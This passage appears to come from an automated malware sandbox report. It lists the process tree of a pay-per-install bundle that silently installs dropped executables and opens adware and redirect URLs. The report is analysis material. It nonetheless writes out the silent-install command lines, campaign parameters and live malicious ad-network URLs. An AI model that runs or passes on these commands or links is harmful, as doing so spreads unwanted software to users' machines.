        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
        11⤵
        
        PID:7736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
        11⤵
        
        PID:7956
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
        11⤵
        
        PID:1708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
        11⤵
        
        PID:5892
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
        11⤵
        
        PID:7940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
        11⤵
        
        PID:4092
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
        11⤵
        
        PID:8164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
        11⤵
        
        PID:6612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
        11⤵
        
        PID:4052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3044 /prefetch:8
        11⤵
        
        PID:1684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:1
        11⤵
        
        PID:6396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1
        11⤵
        
        PID:4548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2108 /prefetch:1
        11⤵
        
        PID:1900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5832 /prefetch:8
        11⤵
        
        PID:7412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
        11⤵
        
        PID:6708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
        11⤵
        
        PID:4268
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
        11⤵
        
        PID:6560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
        11⤵
        
        PID:4984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
        11⤵
        
        PID:6456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
        11⤵
        
        PID:4824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
        11⤵
        
        PID:4420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
        11⤵
        
        PID:5388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
        11⤵
        
        PID:3528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
        11⤵
        
        PID:7572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:1
        11⤵
        
        PID:6656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1
        11⤵
        
        PID:7528
        
        C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
        9⤵
        
        PID:868
    - - C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3604
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319883 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
        6⤵
        
        PID:1924
    - - C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
        5⤵
        Executes dropped EXE
        
        PID:1756
      - C:\Users\Admin\AppData\Local\Temp\is-KRIPU.tmp\WEATHER Manager.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KRIPU.tmp\WEATHER Manager.tmp" /SL5="$500BC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
        7⤵
        
        PID:6212
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319883 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
        8⤵
        
        PID:2568
    - - C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
        5⤵
        Executes dropped EXE
        
        PID:1300
      - C:\Users\Admin\AppData\Local\Temp\is-HKJ95.tmp\VPN.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HKJ95.tmp\VPN.tmp" /SL5="$202B4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\is-3COET.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3COET.tmp\Setup.exe" /silent /subid=720
        7⤵
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\is-U9COI.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-U9COI.tmp\Setup.tmp" /SL5="$204EA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-3COET.tmp\Setup.exe" /silent /subid=720
        8⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        9⤵
        
        PID:5604
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        10⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        9⤵
        
        PID:5272
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        10⤵
        
        PID:4428
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        9⤵
        
        PID:968
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        9⤵
        
        PID:5604
    - - C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
        5⤵
        Executes dropped EXE
        
        PID:4160
    - - C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        5⤵
        Executes dropped EXE
        
        PID:4140
      - C:\Users\Admin\AppData\Local\Temp\is-N35IP.tmp\MediaBurner2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N35IP.tmp\MediaBurner2.tmp" /SL5="$202B0,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\is-N264C.tmp\3377047_logo_media.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-N264C.tmp\3377047_logo_media.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:6032
        
        C:\Program Files\Microsoft Office 15\XKPTDHPAYE\ultramediaburner.exe
        
        "C:\Program Files\Microsoft Office 15\XKPTDHPAYE\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:460
        
        C:\Users\Admin\AppData\Local\Temp\is-44HHO.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-44HHO.tmp\ultramediaburner.tmp" /SL5="$402A6,281924,62464,C:\Program Files\Microsoft Office 15\XKPTDHPAYE\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        
        PID:2428
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\25-949f9-1a2-c9f94-16f32e62120fe\ZHonucywepi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\25-949f9-1a2-c9f94-16f32e62120fe\ZHonucywepi.exe"
        8⤵
        
        PID:6356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        9⤵
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:7012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        10⤵
        
        PID:4984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        9⤵
        
        PID:6176
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        10⤵
        
        PID:4524
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
        9⤵
        
        PID:7216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        10⤵
        
        PID:5812
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
        9⤵
        
        PID:4564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x100,0xcc,0x104,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        10⤵
        
        PID:1824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
        9⤵
        
        PID:7868
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        10⤵
        
        PID:3344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
        9⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        10⤵
        
        PID:6960
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
        9⤵
        
        PID:8072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1a4,0x1a8,0x1ac,0x180,0x1b0,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        10⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\96-28063-258-f058f-33a9beac047dd\Myxotojiwi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\96-28063-258-f058f-33a9beac047dd\Myxotojiwi.exe"
        8⤵
        
        PID:7644
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i2fgxwad.cwo\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\i2fgxwad.cwo\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\i2fgxwad.cwo\GcleanerEU.exe /eufive
        10⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 296
        11⤵
        Program crash
        
        PID:7580
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:4088
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jq1oq4lc.pfb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319883 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:7216
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1bvqwlp.p4a\ufgaa.exe & exit
        9⤵
        
        PID:3236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
